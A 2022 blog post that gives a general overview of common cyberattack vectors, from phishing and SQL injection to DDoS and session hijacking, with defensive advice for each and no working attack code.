Rocket exploding a 90s style computer, digital art. Made using DALL-E 2

August 07, 2022

Cybersecurity: Most Common Attack Vectors

Each day, millions of devices connect to the internet. By the end of 2018, there was an estimated 22 billion devices connected around the globe. With so many devices being interconnected, the risk of security vulnerabilities grows at an exponential rate.

By 

Noah Da Silva

Last updated

August 10, 2022

Each day, millions of devices connect to the internet. By the end of 2018, there was an estimated 22 billion devices connected around the globe. With so many devices being interconnected, the risk of security vulnerabilities grows at an exponential rate.

Cyberattacks are ever-increasing, happening multiple times per second. Knowing how attackers are exploiting their way into corporate infrastructure and personal systems, will help reduce the threat of falling victims to one of these attacks.

What is an attack vector?

Attack vectors are different from attack surfaces. An attack surface represents a point of entry or vulnerability that an attacker could potentially use to attempt to break their way into a network. An example of an attack surface would be the ports opened on a network’s firewall. Limiting how many ports are open, would reduce the network’s attack surface.

On the other hand, attack vectors are the approaches exploited by an attacker to breach or break into a network. Some are meant to target and take advantage of weaknesses in the network’s security and infrastructure, and others focus on the people that have access to the network.

Most common attack vectors

We’ll explore some common attack vectors currently being used by bad actors for things like theft, espionage, and sabotage; as well as how to prevent from falling victim to these attack vectors.

Phishing

Phishing is a type of social engineering attack primarily used by attackers posing as a legitimate and trusted institution or person to deceive individuals into sharing user data such as login credentials, banking and credit card details, personally identifiable information (PII), and other sensitive data.

The victim is targeted by email, phone call, or text message, and is tricked into clicking a malicious link that directs them to a fake website or installs malware on the device.

To mitigate phishing attacks, one of the most effective solutions would be vigilance. A spoofed message often contains spelling mistakes, odd phrasing, and slight changes in the domain name’s URL (i.e., www.google.com vs www.gooqle.com). Security awareness training can help keep employees vigilant and lower the threat of phishing attacks by teaching secure practices such as sending the email to the organization to verify the sender’s legitimacy and not clicking on links from external emails.

Another mitigation method includes setting up two-factor authentication (2FA) whenever possible, which adds a second layer of security when signing into an account. Organizations should also consider enforcing strict password policies, like frequently changing passwords and disallowing recycled passwords on different applications and websites.

Malware

Malicious software, or malware, is software designed to damage, disable, or exploit devices or networks. This type of software is used by attackers to compromise device functions, steal data, bypass access controls, and cause harm to other devices connected to the same network. Malware is mainly delivered via email in phishing attempts, fake Wi-Fi hotspots, and planted “lost/unknown” USB devices.

If a device is infected with malware, it will present itself with symptoms such as slowdowns in performance, random reboots, unknown processes starting and closing, emails being sent on their own.

There are many ways to prevent devices from being infected with malware. One of the most important steps in protecting against malware is anti-virus software. It scans files that have been downloaded, verifies the legitimacy of software asking for administrative privileges, and automatically updates to protect the device against the newest known malware.

Installing a firewall is another good prevention method, blocking unauthorized access to or from a network, which limits the chances of an attacker successfully infecting a device. Updating operating systems and software regularly makes sure that there is no known vulnerability still present in their outdated versions. Finally, not clicking on suspicious links or downloading attachments from external emails, and only downloading apps and files from trusted sources are steps that greatly reduce the chances of ever accidentally downloading malware.

Malicious code injection

Code Injection, or Remote Code Execution (RCE), is an attack that exploits an input sanitization flaw present in some software, websites, or programs to execute malicious code. The code injected is in the language that the targeted application and executed by the server-side’s interpreter.

To protect infrastructure from code injection attacks, it is important to treat all data as untrusted. This means validating and sanitizing inputs being sent to the server/application, only allowing a limited set of values intended for the function to run, a sort of whitelisting.

Avoid using vulnerable functions on raw user inputs, some of them for the PHP language include eval(), include(), require(), assert(), preg_replace(), create_function(), and the list goes on.

Another step that is good practice, is to lock down the server interpreter taking the inputs to limit its functionality to the bare minimum needed for the application to run. This greatly reduces the attack surface for the application and means disabling functions that are not used by the program, to prevent them from being exploited. For PHP, common functions that are disabled are exec(), shell_exec(), system(), show_source(), and more.

Cross-site scripting (XSS) attack

XSS attacks are another type of injection attack, which also take advantage of unsanitized user inputs. This attack involves injecting malicious scripts into a rendered website, without targeting servers or the actual website, rather, it turns its focus on a user’s browser. Being cross-site means that the attacker’s script does not originate from the visited site, instead, having a different point of origin.

By executing script code in the user’s current session, usually JavaScript, attackers can steal cookie data and hijack a user’s session to impersonate the user or take control of their account. If the user’s browser has administrative privileges, attackers have the potential to leverage the HTML5 web APIs to access further local data and hardware, such as the camera, microphone, and data stored on the browser (saved passwords, addresses, and credit cards).

As a user there isn’t much that can be done to prevent this type of attack apart from exercising caution when clicking links on more questionable webpages, verifying the domain name of the website visited.

For developers, it is important to sanitize user inputs, apply context-sensitive encoding as recommended by OWASP, and go through the same prevention steps taken to protect against regular code injection attacks.

SQL injection

SQL is a programming language used to communicate with databases. So naturally, attackers will try to exploit poor implementations of SQL to inject SQL statements into user input fields on a website or application in hopes of stealing a vast amount of sensitive data or destroying the database entirely.

This type of attack occurs when a user is asked to enter information, like their username, email, password, or any other type of data. Attackers will enter SQL statements in place of the information asked, in hopes that the website or application did not properly sanitize the input, causing it to unknowingly run on the database.

Applying the same protection to malicious code injection attacks will also help prevent SQL injection attacks.

Compromised, stolen, or weak credentials

Credentials are everywhere, it is impossible to do anything online without using them. Yet, they continue to be a prime target for attackers to exploit.

With the rise in the number of data breaches, phishing scams, and malware infections over the past few years, getting credentials exposed to potential bad actors is only getting more common.

The risk posed by compromised or stolen credentials varies depending on the level of access they provide. Some only provide low-level access, but others provide privileged access for administrative access to network devices, systems, and security tools, giving them almost unfettered access to victims’ digital infrastructure.

Compromised and stolen credentials aren’t alone in posing security risks. Weak and recycled credentials can expose a vulnerability in a network’s security. As attackers are most likely to guess or brute-force their way into devices with these credentials.

To avoid security flaws from compromised, stolen, or weak credentials, it is crucial to employ good password hygiene. This involves not using the same password more than once and never reusing past passwords, updating passwords monthly, using two-factor authentication where possible, and using longer and more complex passwords.

It is a good idea to make use of a password manager or physical journal to safely store credentials. When it comes to sharing credentials with other users, it is best to use encrypted communications like Signal, Telegram, or other encrypted messaging apps, in place of emails, text messages (SMS/MMS), and other chatting apps.

Malicious insiders

A malicious insider is an unhappy employee or someone with insider access to an organization, that steals or discloses private company information and exploits known company vulnerabilities. Their goal often involves monetary profits and/or malicious intent. If they have access to sensitive data or networks, they will be able to do extensive damage to the company’s infrastructure by misusing privileged access or selling that information to bad actors.

As an organization, to protect from malicious insiders, it would be necessary to monitor every device for data and network access to find patterns in behaviour and expose potential insider risk.

Limiting which employees can have access to certain corporate data and who can handle said data, by compartmentalizing data, access levels, and permissions, can address the risk at its roots, and greatly reduce the chances of it occurring and minimize its impact.

Missing or poor encryption

Strong encryption ensures that communications can’t be intercepted by outsiders, preventing man-in-the-middle attacks. Commonly used encryption methods like SSL certificates and DNSSEC makes sure that things like credit card transactions, data storage, and communication are private and secure.

If at any time data, at rest, being processed, or in transit, is missing or has poor encryption, it has the potential to be accessed by attackers with brute force, or worse, being intercepted while transmitting, processing, or stored, in plaintext.

The most common way to have missing encryption is by SSL certificates expiring. On a web server, for example, this means that traffic will be redirected to the HTTP protocol instead of HTTPS, making all data going from the server to the browser visible. Ensuring that certificates are up-to-date or having them auto-renew is a good way to avoid this.

Is it also a good idea to not rely on low-level encryption like DES, given that it has been rendered obsolete by more robust encryption algorithms like TripleDES and AES, and is considered less secure and vulnerable to brute-force attacks.

Lastly, compliance does not equal security. Assuming that following compliance means that data will be encrypted and secured, would be a mistake. Most compliance standards have a limited scope, and are simply pass or fail, either compliant or not, and do not reward for being over compliance. Given that organizations are always evolving, they often pass over security flaws and don’t cover an organization’s entire infrastructure/environment.

Misconfiguration

Attackers can exploit misconfigurations in a company’s infrastructure. Misconfigurations occur when there is an error in the system configuration, which can present unwanted points of entry or hidden flaws in the security of the device, system, or network. For instance, some services use default credentials when first setting it up and failing to change those credentials can pose a serious flaw in the security of the device or system.

To avoid misconfigurations, put a system in place to streamline the configuration process or automate the process when possible. Monitoring and comparing device settings can help find misconfigurations when they occur.

Ransomware

Ransomware is a form of malware that uses encryption to lock and hold a victim’s data at ransom. The data is encrypted to cute access to files, databases, and applications. Ransomware is often designed to propagate across a network and target all databases, file servers, and computers, which can quickly bring an organization’s operations to a paralyzing halt.

Users or organizations are required to pay the ransom with cryptocurrency ranging from hundreds to thousands of dollars to receive the decryption key and be able to regain access to their data.

Note that it is not guaranteed that the attacker will release the decryption key. Some attackers never intend on giving back the encrypted data, scamming the victims out of their money and data.

To prevent falling victim to a ransomware attack, keep operating systems and software up to date to reduce the chances of having an exploitable vulnerability. It is also important to be more careful when installing software and allowing administrative privileges/access especially if the software might not have come from a trusted source.

Zero-day vulnerabilities and outdated software

New vulnerabilities are found every day, whether it is for an operating system or software. For developers, patching them feels more like a game of cat and mouse.

If left unchecked, outdated software can present itself with old vulnerabilities that attackers can exploit. Regularly updating devices and software used on a network, can ensure that no known and patched vulnerabilities will be present.

On the other hand, attacks exploiting zero-day vulnerabilities can be difficult to prevent, given that these vulnerabilities are only known when a breach or attack occurs. They would need to be patched before an attacker can exploit them.

DDoS attacks

Distributed Denial of Service (DDoS) attacks are malicious attempts taken against network resources such as data centers, websites, or servers. They are carried out by groups of compromised machines, which can consist of computers, IoT devices, and other networked resources and devices.

The end goal of a DDoS attack is to overwhelm and flood the targeted network resources with unfathomable amounts of messages and internet traffic, which causes the target or its surrounding infrastructure to experience slowdowns and crashes that bring it offline.

There are a few ways to help mitigate DDoS attacks. The first method would be to design infrastructure with redundancy in mind. The easiest way to accomplish this would be to ensure that data servers have different networks and paths, locating them in different data centers at separate geographical points and utilizing multiple service providers.

The second method to help mitigate DDoS attacks would be to implement proxies and firewalls. Cloudflare is an example of a service that helps filter traffic using artificial intelligence and hide web servers’ IP addresses with their reverse proxy.

Another method would be to use cloud-based hosting from big providers like AWS, Azure, Digital Ocean, and Linode. This will ensure near-constant uptime since resources are shared over multiple servers and data centers, and most of the cloud providers offer some level of DDoS protection, either included or at an extra cost.

In an event that a DDoS attack is successful, there are brute methods that can help with minimizing the damages.

One option for web servers is to reroute traffic to a static version of the website, which doesn’t have full functionality but requires fewer resources.

Another is to limit the rate of requests that can be made to the server or limit the bandwidth of the inbound traffic.

Alternatively, creating blackhole routes is a more extreme way to remediate the attack. When implemented, blackhole filtering will route all network traffic, malicious or not, to a null route or blackhole, dropping it from the network.

Man-in-the-middle attack

A man-in-the-middle (MitM) attack is a type of cyberattack, classified as eavesdropping and tampering, when an attacker sites between two network points, usually the victim and a legitimate host, and intercepts their communications. The goal of these attacks is to steal information or login credentials, spy on victims, sabotage communications, or corrupt data.

An attack can be very difficult to detect since the traffic is either rerouted to a phishing site or passed on to its original destination once collected.

Thankfully, protecting against MitM attacks is simple and all involve encryption. The strong the encryption, the safer.

Having strong WEP/WAP encryption on wireless access points prevents nearby outsiders from joining a private network. It is also very important to change the default login on routers or modems on a private network. This is not a Wi-Fi password, but separate credentials for the router itself. The default login is almost always “admin” “admin” or “admin” “password”, so an attacker could easily get access to the device.

One way to encrypt internet traffic would be to force the use of HTTPS instead of HTTP to ensure that the webserver uses public-private key exchange when communicating.

Another way would be to use a virtual private network (VPN) especially when connected to public Wi-Fi networks like hotels, coffee shops, and airports. When using a VPN, it creates a secure tunnel between the device and the internet, which encrypts the data sent to the exit node, an external VPN server, which then forwards the data to its destination.

Session hijacking

Session hijacking is an attack where an attacker takes over a user’s session, often a browser and web application session. Although any session can be susceptible to being hijacked.

HTTP is a stateless protocol and needs to have session cookies attached to every HTTP header. For an attack to successfully hijack a victim’s session, they first need to know their session key, which can be obtained by stealing the victim’s session cookie.

There are two ways of stealing session keys, the first is cross-site scripting (XSS). If the webserver is improperly configured, attackers can gain access to a victim’s session key by injecting scripts into their browser.

The second way of stealing session keys is called session side-jacking. This method involves an attack monitoring the traffic of the network using packet sniffers and can intercept the victim’s session cookies after it has been authenticated. This only works if websites only use SSL/TLS encryption for their login pages.

Another method is called session fixation and differs from the last two methods. It does not focus on stealing a session key but instead focuses on an attacker supplying a session key and tricking a victim into visiting a vulnerable website.

If an attacker successfully hijacks a user’s session, they can perform any action that the user would be authorized to do. The more privileges the user has, the more damage an attack can do.

To prevent session hijacking attacks, web applications need to be strengthened. One way is to ensure the use of HTTPS so that SSL/TLS encryption is present throughout the session traffic. This will encrypt session keys and they will not be displayed in plaintext, protecting against packet sniffing.

Setting up an HTTPOnly attribute to the session cookies will prevent client-side scripts from accessing data. It will protect against cross-site scripting, by ensuring that only the server can access cookies.

Some other methods include proper session management using web frameworks, rolling the session keys after initial authentication to prevent the session key from being extracted, and performing additional verification steps such as the user’s IP address and usage trends.

For users, using a VPN, especially when connected to public Wi-Fi, will help keep sessions private and secure, making it considerably more difficult for attackers to access sensitive information that has the potential to expose a session key.

Brute force attacks

A brute force attack uses trial-and-error to guess or crack login credentials, encryption keys, or hidden web pages.

It is not an attack vector on its own, given that it works across all the other approaches listed above.

While being an old attack method, brute force is still effective and a popular option for attackers to start their attacks.

An organization failing to properly secure its infrastructure could put itself in a position where brute force may be a feasible option for attackers.

Brute force attacks benefit from a range of vulnerabilities, like weak or short passwords, outdated or weak encryption standards, unsecured network devices, and more.

To protect against brute force attacks, ensure that the encryption standards that are currently in place are up to date and are using the strongest encryption available, ensure that all devices on the network have updated credentials and that all credentials include a strong password and two-factor authentication (2FA) where possible.

Third and fourth-party vendors

Most organizations outsource some of their functions to third-party vendors, including payroll, information technology, server hosting, and other services. These options offer organizations flexibility when expanding, but while convenient, outsourcing introduced its own set of cybersecurity risks.

Often, these vendors require access to sensitive data to provide their services. While they usually have good security practices, any organization is susceptible to cyber threats such as data breaches and other forms of exposure that can be damaging to their operations.

Trusting vendors and making sure they meet security standards in-line with protection against new immerging cyber threats is an important step in ensuring lower risk when onboarding any vendor.

If an organization chooses a vendor that does not take their cybersecurity seriously, it could introduce unnecessary vulnerabilities in their cyber defences, regardless of the level of security risk management implemented.

Conclusion

In a perfect world, there would not be any treats to digital infrastructure, but unfortunately, the world is not perfect, and organizations constantly fall victim to cyberattacks.

While often expensive to implement and maintain, cybersecurity is a critical component of an organization’s infrastructure and operations that cannot be ignored or be done inadequately.

Knowing what cyber threats are out there is a critical part of keeping an organization secure, and following industry security compliance standards like HIPAA, PCI DSS, GDPR, FISMA, SOX, ISO/IEC 27001, and SOC 2, is not perfect but is a great place to start building the foundations of a secure and private infrastructure.

Found this useful?

1 users liked this post.

Share this post with others

0 Comments

Post

Finished reading?

Check out other posts just like this one.